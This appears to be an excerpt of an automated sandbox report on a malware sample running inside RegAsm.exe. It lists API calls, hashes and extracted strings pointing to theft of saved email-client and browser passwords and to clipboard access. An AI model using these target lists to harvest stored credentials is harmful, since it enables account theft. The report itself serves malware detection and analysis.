                                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: QueryValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3660427363-0
                                                                                                                                              • Opcode ID: 0efd375066d84b9126104ad8b8140e0b1f33649f9e97a4d5cf1c1528608a19b3
                                                                                                                                              • Instruction ID: d2a128bda891c33a071a1d1ce147914e72007c559b7d4fbb3b047f84c0d4c772
                                                                                                                                              • Opcode Fuzzy Hash: 0efd375066d84b9126104ad8b8140e0b1f33649f9e97a4d5cf1c1528608a19b3
                                                                                                                                              • Instruction Fuzzy Hash: 45D092B540020EFFDF018F81EC45EEE7BBDFB04348F104166BA05A6060E671AB55ABA4
                                                                                                                                              APIs
                                                                                                                                              • ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                              • Opcode ID: f65a168b1810926023e0ef961af8b8fe703345c76f3ebc05859e8d9c9091ddda
                                                                                                                                              • Instruction ID: 410abe984f7b5dc679d26b2641a37aa2388815a2676dab069d7a0e9e19a31d2a
                                                                                                                                              • Opcode Fuzzy Hash: f65a168b1810926023e0ef961af8b8fe703345c76f3ebc05859e8d9c9091ddda
                                                                                                                                              • Instruction Fuzzy Hash: ECD0C93501020DFBDF01CF80DC06FDD7BBDEB05359F108054BA0095160C7759A10AB94
                                                                                                                                              APIs
                                                                                                                                              • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                              • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                              • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                                              • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                              • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                                              APIs
                                                                                                                                              • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                              • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                              • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                                              • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                              • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                                              APIs
                                                                                                                                              • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                              • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                              • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                                              • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                              • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                                              APIs
                                                                                                                                              • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseFind
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1863332320-0
                                                                                                                                              • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                              • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                                              • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                              • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Open
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                              • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                              • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                                                              • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                              • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                              • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                              • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                                                              • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                              • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00407948: free.MSVCRT ref: 0040794B
                                                                                                                                                • Part of subcall function 00407948: free.MSVCRT ref: 00407953
                                                                                                                                              • free.MSVCRT ref: 00407D7C
                                                                                                                                                • Part of subcall function 00407A1F: free.MSVCRT ref: 00407A2E
                                                                                                                                                • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free$mallocmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3401966785-0
                                                                                                                                              • Opcode ID: a1ae40bd3782b748071a2eaf40207b68e6d5397b3c2520726b72686718a28406
                                                                                                                                              • Instruction ID: d7b0144154ef41658eb0158d6140425370aaa91bbe4ae82c15578abe9a627f9f
                                                                                                                                              • Opcode Fuzzy Hash: a1ae40bd3782b748071a2eaf40207b68e6d5397b3c2520726b72686718a28406
                                                                                                                                              • Instruction Fuzzy Hash: DF5148B5D0821AAFCB109F99D4809ADFBB1BF44314B24817BE950B7391C738BE45CB96
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 00402ECA
                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?), ref: 00402EDD
                                                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 00402F6A
                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?), ref: 00402F77
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402FD1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                                              • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                              • API String ID: 52435246-1534328989
                                                                                                                                              • Opcode ID: 12cd8b5aae31976545c709c40371195406968ac39575e2cfa7706d38b8864041
                                                                                                                                              • Instruction ID: 5dbeba4814e3302d002d767d8bad135afcd275429644e03c8fd50da481ddfc04
                                                                                                                                              • Opcode Fuzzy Hash: 12cd8b5aae31976545c709c40371195406968ac39575e2cfa7706d38b8864041
                                                                                                                                              • Instruction Fuzzy Hash: 7C512DB1900218BAEB51EB51CD46FDEB77CEF04744F1481A7B908A6191DBB89B84CF98
                                                                                                                                              APIs
                                                                                                                                              • EmptyClipboard.USER32 ref: 00406E06
                                                                                                                                                • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                                                                                                              • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00406E41
                                                                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00406E63
                                                                                                                                              • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                                                                                                              • GetLastError.KERNEL32 ref: 00406E74
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00406E80
                                                                                                                                              • GetLastError.KERNEL32 ref: 00406E8B
                                                                                                                                              • CloseClipboard.USER32 ref: 00406E94
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3604893535-0
                                                                                                                                              • Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                                              • Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
                                                                                                                                              • Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                                              • Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9
                                                                                                                                              APIs
                                                                                                                                              • EmptyClipboard.USER32 ref: 00406EA7
                                                                                                                                              • strlen.MSVCRT ref: 00406EB4
                                                                                                                                              • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C360,?), ref: 00406EC3
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00406ED0
                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000001,?,?,?,?,0040C360,?), ref: 00406ED9
                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00406EE2
                                                                                                                                              • SetClipboardData.USER32(00000001,00000000), ref: 00406EEB
                                                                                                                                              • CloseClipboard.USER32 ref: 00406EFB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3116012682-0
                                                                                                                                              • Opcode ID: 1f4c6f9f90a19b00bc9d76a8b9f701475e5d8083360905b26116392cc3d2db55
                                                                                                                                              • Instruction ID: 469d781c3ef94e65abf7249e996c377109e97d6fa28bdd4c6fbc6e531372765c
                                                                                                                                              • Opcode Fuzzy Hash: 1f4c6f9f90a19b00bc9d76a8b9f701475e5d8083360905b26116392cc3d2db55
                                                                                                                                              • Instruction Fuzzy Hash: FFF0BB3F1002196BD2502FA5FC8CE5B776CDB85B56709413DF906D2252DE34980447F9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                              • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                              • API String ID: 3963849919-1658304561
                                                                                                                                              • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                              • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                                              • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                              • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@??3@memcpymemset
                                                                                                                                              • String ID: (yE$(yE$(yE
                                                                                                                                              • API String ID: 1865533344-362086290
                                                                                                                                              • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                              • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                                                              • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                              • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                                              APIs
                                                                                                                                              • strlen.MSVCRT ref: 004431AD
                                                                                                                                              • strncmp.MSVCRT ref: 004431BD
                                                                                                                                              • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                                                                                                                              • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                                                                              • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                              • API String ID: 1895597112-3210201812
                                                                                                                                              • Opcode ID: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                                                                              • Instruction ID: 70136e13f872b1b8ab9f6622f700308096b0d0b5c52b82b67a7483c56e51dea4
                                                                                                                                              • Opcode Fuzzy Hash: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                                                                              • Instruction Fuzzy Hash: 4AF10B718012589BDB22CF54C8487DEBBB4BB0278BF5485CAD8597B242C7B85B8DCF58
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                              • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                              • API String ID: 1714764973-479759155
                                                                                                                                              • Opcode ID: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                                                                              • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                                                                                                              • Opcode Fuzzy Hash: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                                                                              • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040EBD8
                                                                                                                                                • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                              • memset.MSVCRT ref: 0040EC2B
                                                                                                                                              • memset.MSVCRT ref: 0040EC47
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                                              • memset.MSVCRT ref: 0040ECDD
                                                                                                                                              • memset.MSVCRT ref: 0040ECF2
                                                                                                                                              • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                                                              • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                                                              • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                                                              • memset.MSVCRT ref: 0040EDE1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                              • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                              • API String ID: 3137614212-1455797042
                                                                                                                                              • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                                                              • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                                                                              • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                                                              • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                                                                                                                              • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                                                                              • API String ID: 2814039832-2206097438
                                                                                                                                              • Opcode ID: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                                                                              • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                                                                                                                              • Opcode Fuzzy Hash: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                                                                              • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                • Part of subcall function 00408934: CloseHandle.KERNEL32(?), ref: 0040899C
                                                                                                                                                • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                              • memset.MSVCRT ref: 0040E5B8
                                                                                                                                              • memset.MSVCRT ref: 0040E5CD
                                                                                                                                              • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                                              • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                                              • memset.MSVCRT ref: 0040E6B5
                                                                                                                                              • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                                                                                                                              • memset.MSVCRT ref: 0040E736
                                                                                                                                              • memset.MSVCRT ref: 0040E74F
                                                                                                                                              • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                              • sprintf.MSVCRT ref: 0040E788
                                                                                                                                              • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                              • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                              • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                              • memset.MSVCRT ref: 0040E858
                                                                                                                                              • sprintf.MSVCRT ref: 0040E873
                                                                                                                                              • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                              • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
